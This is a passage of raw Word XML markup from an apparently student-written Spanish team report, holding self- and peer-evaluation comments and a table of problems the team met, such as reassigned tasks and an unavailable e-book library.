    <w:p w:rsidR="00BE3402" w:rsidRDefault="00BE3402" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008B383D" w:rsidRPr="007B7B4D" w:rsidRDefault="00B55E21" w:rsidP="008B383D">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E74383">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008B383D">
        <w:t xml:space="preserve">Considero que en esta actividad mi equipo y yo estuvimos trabajando </w:t>
      </w:r>
      <w:r w:rsidR="00E74383">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00E74383">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008B383D">
        <w:t xml:space="preserve">de </w:t>
      </w:r>
      <w:r w:rsidR="008B383D">
        <w:tab/>
        <w:t xml:space="preserve">manera equitativa y regular, a pesar de que apenas nos integramos </w:t>
      </w:r>
      <w:r w:rsidR="00E74383">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008B383D">
        <w:t xml:space="preserve">como </w:t>
      </w:r>
      <w:r w:rsidR="008B383D">
        <w:tab/>
        <w:t xml:space="preserve">equipo desarrollador, para comenzar la actividad estuvo un poco </w:t>
      </w:r>
      <w:r w:rsidR="00E74383">
        <w:tab/>
        <w:t xml:space="preserve">sencilla y </w:t>
      </w:r>
      <w:r w:rsidR="008B383D">
        <w:t xml:space="preserve">todos cumplimos con la parte que nos correspondía. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRDefault="00742B07" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRDefault="00742B07" w:rsidP="00411995">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0069251A" w:rsidRDefault="0069251A" w:rsidP="0069251A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Erick Antonio Mejía Meza</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRDefault="00742B07" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00742B07">
        <w:t>¿Por qué me auto-evaluó de esta forma?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRPr="00742B07" w:rsidRDefault="00742B07" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC38A0" w:rsidRPr="00F81D21" w:rsidRDefault="00EC38A0" w:rsidP="00EC38A0">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C84298">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Me evaluó de esta manera ya que todos trabajos de igual manera.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRDefault="00742B07" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRPr="00742B07" w:rsidRDefault="00742B07" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRDefault="00742B07" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00742B07">
        <w:t>¿Por qué co-evaluó a mis compañeros de esta forma?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C84298" w:rsidRDefault="00C84298" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC38A0" w:rsidRDefault="00EC38A0" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC38A0" w:rsidRDefault="00EC38A0" w:rsidP="00EC38A0">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C84298">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EC38A0">
        <w:t xml:space="preserve">Les asigne esa calificación ya que completaron sus actividades, </w:t>
      </w:r>
      <w:r w:rsidR="00B55E21">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E74383">
        <w:t xml:space="preserve">además de </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC38A0">
        <w:t>eso dan solución a los problemas presentados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E6411" w:rsidRDefault="007E6411" w:rsidP="00EC38A0"/>
    <w:p w:rsidR="007E6411" w:rsidRDefault="007E6411" w:rsidP="00EC38A0"/>
    <w:p w:rsidR="007E6411" w:rsidRPr="00EC38A0" w:rsidRDefault="007E6411" w:rsidP="00EC38A0"/>
    <w:p w:rsidR="00742B07" w:rsidRDefault="00742B07" w:rsidP="0069251A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0069251A" w:rsidRDefault="0069251A" w:rsidP="0069251A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Andrés Moreno García</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRDefault="00742B07" w:rsidP="0069251A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRDefault="00742B07" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00742B07">
        <w:t>¿Por qué me auto-evaluó de esta forma?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRDefault="00742B07" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003F0EBC" w:rsidRDefault="003F0EBC" w:rsidP="003F0EBC">
      <w:pPr>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Me auto-evaluó </w:t>
      </w:r>
      <w:r w:rsidR="00E74383">
        <w:t>de esta manera ya que considero</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> que realice un buen trabajo realizando las investigaciones y el de acomodar la información en el documento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F0EBC" w:rsidRPr="00742B07" w:rsidRDefault="003F0EBC" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRPr="00742B07" w:rsidRDefault="00742B07" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRDefault="00742B07" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00742B07">
        <w:t>¿Por qué co-evaluó a mis compañeros de esta forma?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRDefault="00742B07" w:rsidP="0069251A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00945DD8" w:rsidRPr="009766D8" w:rsidRDefault="00945DD8" w:rsidP="00945DD8">
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="851"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Co-evaluó a mis compañeros de esta manera ya que considero que realizaron un excelente trabajo, iniciando con una buena comunicación al momento de dividir la actividad de buena manera para iniciar con la actividad.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00945DD8" w:rsidRDefault="00945DD8" w:rsidP="0069251A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0069251A" w:rsidRDefault="0069251A" w:rsidP="0069251A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D61892" w:rsidRDefault="00D61892" w:rsidP="0069251A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D61892" w:rsidRDefault="00D61892" w:rsidP="0069251A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A3694B" w:rsidRDefault="00A3694B" w:rsidP="00D61892">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:sectPr w:rsidR="00A3694B" w:rsidSect="002D6D25">
          <w:headerReference w:type="default" r:id="rId105"/>
          <w:footerReference w:type="default" r:id="rId106"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1417" w:right="1701" w:bottom="1417" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D61892" w:rsidRDefault="00D61892" w:rsidP="00D61892">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc514520861"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>PROBLEMAS PRESENTADOS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="0069251A" w:rsidRDefault="0069251A" w:rsidP="00411995">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabladecuadrcula4-nfasis42"/>
        <w:tblW w:w="12895" w:type="dxa"/>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Look w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1425"/>
        <w:gridCol w:w="9910"/>
        <w:gridCol w:w="1560"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A3694B" w:rsidRPr="009B0334" w:rsidTr="005702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95" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00A3694B" w:rsidRPr="009B0334" w:rsidRDefault="00A3694B" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>Problemas presentados</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A3694B" w:rsidRPr="009B0334" w:rsidTr="005702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A3694B" w:rsidRPr="009B0334" w:rsidRDefault="00A3694B" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9910" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A3694B" w:rsidRPr="009B0334" w:rsidRDefault="008A15A6" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>30480</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>167318</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="6059606" cy="2676374"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="2" name="Imagen 2"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n relacionada"/>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059606" cy="2676374"/>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60" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A3694B" w:rsidRPr="009B0334" w:rsidRDefault="00A3694B" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A3694B" w:rsidRPr="009B0334" w:rsidTr="005702EF">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="12895" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w:rsidR="00A3694B" w:rsidRPr="009B0334" w:rsidRDefault="00A3694B" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A5499E" w:rsidRPr="009B0334" w:rsidTr="005702EF">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="2828"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1425" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A5499E" w:rsidRPr="009B0334" w:rsidRDefault="00A5499E" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00A5499E" w:rsidRPr="009B0334" w:rsidRDefault="00A5499E" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B0334">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11470" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="009368E2" w:rsidRDefault="009368E2" w:rsidP="009368E2">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Uno de los problemas presentados en el desarrollo de esta actividad es que se tuvo que cambiar la asignación de actividades que previamente se habían asignado ya que se hicieron cambios en los equipos, esta mala organización se solucionó por así decirlo volviendo  a trabajar en la reasignación de actividades.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A5499E" w:rsidRPr="009B0334" w:rsidRDefault="00A5499E" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:ind w:firstLine="0"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A5499E" w:rsidRPr="009B0334" w:rsidTr="005702EF">
        <w:trPr>
          <w:trHeight w:val="5360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1425" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A5499E" w:rsidRPr="009B0334" w:rsidRDefault="00A5499E" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00A5499E" w:rsidRPr="009B0334" w:rsidRDefault="00A5499E" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00A5499E" w:rsidRPr="009B0334" w:rsidRDefault="00A5499E" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00A5499E" w:rsidRPr="009B0334" w:rsidRDefault="00A5499E" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B0334">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t xml:space="preserve">    2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11470" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="009368E2" w:rsidRDefault="009368E2" w:rsidP="009368E2">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Otro problema presentado considero que fue en cuanto a las distintas formas de trabajo que cada uno de los nuevos integrantes de los equipos tenemos, esto se solucionó pues hablando y poniendo claro las formas de trabajar que son las mejores para un buen desarrollo de la actividad y sobre todo para tener una armonía como equipo.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A5499E" w:rsidRPr="009B0334" w:rsidRDefault="00A5499E" w:rsidP="00A5499E">
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A5499E" w:rsidRPr="009B0334" w:rsidTr="00DA02C8">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="2108"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1425" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A5499E" w:rsidRPr="009B0334" w:rsidRDefault="00A5499E" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00A5499E" w:rsidRPr="009B0334" w:rsidRDefault="00A5499E" w:rsidP="005702EF">
            <w:pPr>
              <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11470" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00A5499E" w:rsidRPr="00130872" w:rsidRDefault="00130872" w:rsidP="00130872">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00130872">
              <w:t>No cargaba la sección de E-libro de la biblioteca digital, la solución de este problema fue investigar los temas en otros medios como libros impresos y sitios de internet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A5499E" w:rsidRPr="009B0334" w:rsidTr="005702EF">
        <w:trPr>
          <w:trHeight w:val="3170"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
